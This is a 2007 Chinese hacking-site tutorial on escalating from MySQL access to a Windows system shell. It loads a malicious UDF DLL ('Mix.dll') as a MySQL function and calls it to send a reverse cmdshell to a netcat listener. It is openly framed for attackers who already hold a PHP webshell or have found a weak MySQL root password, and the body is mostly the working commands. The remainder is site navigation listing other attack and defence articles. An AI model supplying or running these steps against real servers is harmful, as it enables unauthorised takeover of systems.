MySql本地提升演示
日期:2007年4月28日 作者: 查看:[大字体 中字体 小字体]-
前段时间听说mysql利用Mix.dll可以直接拿到系统权限,我在本地测试了一下,效果不错,我是在windows server2003 sp1下测试的,测试MYSQL的版本是4.0.23,这个提升在什么情况能够利用呢?比如我们获得一个phpshell的情况下,没装serv-u,又没装pcanywhere,就装了一个mysql,所知的提升方法在这里也用不上,这时就可以用到这个方法了,在扫到MYSQL弱口令的情况下也能用上, 怎么把DLL文件传上去呢?请自行查看Mix的文章,我本地测试就不多此一举了,现在我们来看一下该怎么样弄的。我们先登陆MYSQL,开始-运行- CMD 跳到MYSQL的安装目录。输入mysql -uroot -p 用户名root 密码为空。好登陆成功,如图1

好现在我们输入create function Mixconnect returns string soname 'c:\\Mix\\Mix.dll'; 我们需要注册Mixconnect来执行系统命令。这里的c:\\mix\\mix.dll就是我本机的 Mix.dll的路径。输入后按回车,出现Qusery OK等字样,那就是注册成功了。如图2
好了显示注册成功,然后我们用NC监听1234端口,nc -l -p 1234 。如图3
快到关键的时刻咯,时时关注此NC窗口。现在我们在登陆MYSQL的那个CMD窗口输入select Mixconnect('127.0.0.1','1234');然后按回车,就定在那里了,而监听的那个窗口已经成功得到一个cmdshell了。如图4
- [1] [2] 下一页
-
- MySql本地提升演示 相关文章:
- MySql本地提升演示 相关软件
- 特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作
- 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转
- 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源:http://www.hackhome.com
上一篇:游戏私服安全攻防技巧之高级篇
下一篇:QQ挂号升级方法
精品推荐
热点TOP10
- ·104种清除木马方法
- ·netcat使用指南
- ·无线攻防:破解WEP密钥过程全解
- ·IP 伪 装 法
- ·php注入专题
- ·检测和删除系统中的木马(Trojan Horse)教程
- ·反病毒引擎设计全解
- ·Do All in Cmd Shell (一切尽在命令行)
- ·网络钓鱼式攻击 挂QQ等级网站
- ·警惕隐私 偷窥随时都会发生
- ·黑客入侵具体环节
- ·Php+Mysql注入专题
- ·ASP漏洞大集合最新
- ·PHP注入某大型网站
- ·CGI漏洞集锦
- ·使用 OpenSSL API 进行安全编程
- ·AIX PowerPC体系结构及其溢出技术学习笔记
- ·百炼成钢-打磨你的Outpost防火墙
- ·MSSQL注入攻击服务器与防护
- ·Win2003服务器组网、安全管理全攻略(1)
特别推荐
- ·IIS攻击与日志
- ·ASP漏洞大集合最新
- ·网络安全常识:九招防范黑客的简单办法
- ·Webmail攻防实战
- ·认清主动防御 安全软件的困惑与走向
- ·网络安全新木桶理论与信息安全
- ·网络钓鱼式攻击 挂QQ等级网站
- ·黑客入侵具体环节
- ·IP 伪 装 法
- ·TCP端口的作用、漏洞和操作建议
- ·104种清除木马方法
- ·CGI漏洞集锦
- ·什么是注入式攻击(1)
- ·Win2003服务器组网、安全管理全攻略(1)
- ·sqlexp攻击.怎么防止?
- ·AIX PowerPC体系结构及其溢出技术学习笔记
- ·Php+Mysql注入专题
- ·安全方案:如何构建和配置安全的Web站点
- ·不要以为装了防火墙,我就治不了你!!
- ·后门查找初步
